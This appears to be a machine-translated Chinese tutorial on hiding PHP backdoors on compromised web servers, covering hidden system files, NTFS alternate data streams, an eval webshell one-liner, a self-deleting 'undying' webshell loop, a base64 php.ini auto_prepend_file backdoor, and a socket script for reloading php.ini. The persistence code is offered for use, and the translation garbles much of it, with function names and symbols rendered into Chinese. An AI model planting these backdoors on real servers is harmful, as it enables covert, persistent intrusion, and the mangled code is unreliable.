这篇文章主要介绍了php后门隐藏技巧有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获、下面让小编带着大家一起了解一下。
1。attrib + s + h
创建系统隐藏文件:
属性+ s + + r + h
属性+ s + h文件名
10在Windows下即使开启了显示隐藏的项目,或dir仍然看不见。
2。利用广告隐藏文件
NTFS交换数据流(备用数据流,简称广告)是NTFS磁盘格式的一个特性,在NTFS文件系统下,每个文件都可以存在多个数据流。通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用广告数据流,我们可以做很多有趣的事情。(抄的)
首先创建广告隐藏文件
在命令行,呼应一个数据流进的去,比如索引文件是正常文件。
回声^ & lt; ?($ _REQUEST [1]); php @ eval调用这些查找? ^祝辞比;index . php: shell.jpg
这样就生成了一个不可见的index . php: shell.jpg
使用dir/r查看
可使用命令直接修改,要删除的话直接删除指数。php就好了
第二步,直接使用正常文件包含。
做一些免杀
把index . php: shell.jpg十六进制编码& lt; ? php
$=?96 e6465782e7068703a7368656c6c2e6a7067";
//index . php: shell.jpg十六进制编码
$ b=癮";
包括(包(& # 39;H * & # 39;, $ $ b))
?在
引用>3。php环境变量留壳
在c盘创建这个目录
丢个图片一句话
然后文件包含,就好。为了隐蔽可以包含图片马,txt等。
4。不死马
运行后,会删除自身,生成一个webshell.php,管理员删除后还会生成。
& lt; ? php
set_time_limit (0);
ignore_user_abort (1),
拆开(__FILE__);
, (1) {
写入(& # 39;webshell.php& # 39; & # 39; & lt; ?(php @ eval调用这些查找$ _POST [“password"]); ?祝辞& # 39;);
睡眠(5);}
引用>
解决覆盖重写或者重启web服务删掉即可。
& lt; ? php
set_time_limit (0);
ignore_user_abort (1),
拆开(__FILE__);
, (1) {
写入(& # 39;webshell.php& # 39; & # 39;明确# 39;);
睡眠(1);}
引用>
五。php . ini后门
将下面后门写入php . ini中
allow_url_include=
auto_prepend_file=笆?;base64, PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8 +“
//base64 & lt; ?($ _REQUEST (cmd)); php @ eval调用这些查找?在
//后门类型可自己修改。
引用>
这些做好后,重启web服务就好了。
方法1。如果权限很大的话,自己手动重启,缺点容易暴露,重启服务,就要上服务器,某里的服务器,异地登陆有短信提醒。
方法2。就是加载一个php_socke。php脚本,让他重新加载php . ini中
此后门,任何php都可菜刀连接
& lt; ?php
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
/*,,只适用于windows系统,,*/
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
,(真正的){//别问我为什么要死循环,我也不清楚,只有设置成死循环才能加载新php的。ini…
@set_time_limit (0);
$系统=strtoupper (substr (PHP_OS 0 3));
如果(! extension_loaded(& # 39;套接字# 39;))
{
if($系统==& # 39;赢得# 39;){@dl (& # 39; php_sockets.dll& # 39;) ordie(“停下来# 39;t加载socket");}}
$主机=& # 39;255.255.255.255& # 39;;//,搞一个不存在的ip,万一给人家反弹过去了岂不是真尴尬了~ ~ ~
php后门隐藏技巧有哪些